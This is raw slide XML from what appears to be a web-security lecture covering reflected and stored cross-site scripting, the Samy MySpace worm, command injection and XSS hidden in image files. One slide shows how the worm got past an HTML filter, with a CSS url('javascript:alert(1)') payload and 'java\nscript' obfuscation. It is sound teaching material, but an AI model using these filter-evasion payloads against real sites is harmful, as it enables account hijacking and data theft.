          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2319338" y="4521200"/>
            <a:ext cx="2638425" cy="400050"/>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24589" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2714625" y="37052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24590" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24591" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2894013"/>
            <a:ext cx="3211512" cy="687387"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24592" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2846388" y="2749550"/>
            <a:ext cx="2305050" cy="400050"/>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24593" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="30480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24594" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028825" y="40068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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 27"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="4019550"/>
            <a:ext cx="4953000" cy="1238250"/>
            <a:chOff x="914400" y="4019490"/>
            <a:chExt cx="4953000" cy="1238310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3332163" y="4019490"/>
              <a:ext cx="2535237" cy="400069"/>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Send bad stuff</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="TextBox 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="914400" y="4857731"/>
              <a:ext cx="2535238" cy="400069"/>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Reflect it back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a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25603" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2601913"/>
            <a:ext cx="1436688" cy="1436687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25604" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5959475" y="4979988"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25605" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5564188" y="1905000"/>
            <a:ext cx="2436812" cy="846138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25606" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="15240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25607" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="4552950"/>
            <a:ext cx="17605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25608" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5576887" y="3652838"/>
            <a:ext cx="1801813" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25609" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="14652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sp>
        <p:nvSpPr>
          <p:cNvPr id="25610" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3276600"/>
            <a:ext cx="1720850" cy="1016000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25611"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25612" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3036888" y="4067175"/>
            <a:ext cx="2141537" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25613" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2311400" y="4568825"/>
            <a:ext cx="2932113" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>receive malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25614" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6750050" y="2865438"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25615" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1039646">
            <a:off x="2713038" y="3703638"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25616" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2084388" y="40862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25617" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25618" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2205038"/>
            <a:ext cx="3211512" cy="687387"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25619" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2759075" y="2060575"/>
            <a:ext cx="2301875" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>steal valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25620" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-713606">
            <a:off x="2438400" y="23590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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 23"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3457575"/>
            <a:ext cx="6726238" cy="1590675"/>
            <a:chOff x="1752600" y="3457525"/>
            <a:chExt cx="6726237" cy="1590725"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5943599" y="3457525"/>
              <a:ext cx="2535238" cy="400063"/>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Store bad stuff</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 22"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1752600" y="4648187"/>
              <a:ext cx="2535238" cy="400063"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Download it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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MySpace.com   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>(Samy worm)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62468" name="Rectangle 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1524000"/>
            <a:ext cx="8686800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Users can post HTML on their pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>MySpace.com ensures HTML contains no</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;, &lt;body&gt;, onclick, &lt;a href=javascript://&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>…  but can do Javascript within CSS tags:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Times"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;div style=“background:url(‘javascript:alert(1)’)”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Times"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>And can hide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java\nscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="90000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>With careful javascript hacking:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Samy worm infects anyone who visits an infected MySpace page   …    and adds Samy as a friend.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Samy had millions of friends within 24 hours.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62469" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="6467475"/>
            <a:ext cx="3189288" cy="314325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="90000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://namb.la/popular/tech.html</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46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246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46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468">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468">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6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1283077" name="Rectangle 5" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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Stored XSS using images</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1676400"/>
            <a:ext cx="8229600" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Suppose   pic.jpg   on web server contains HTML !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> request for    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://site.com/pic.jpg    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>results in:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>			      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP/1.1  200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
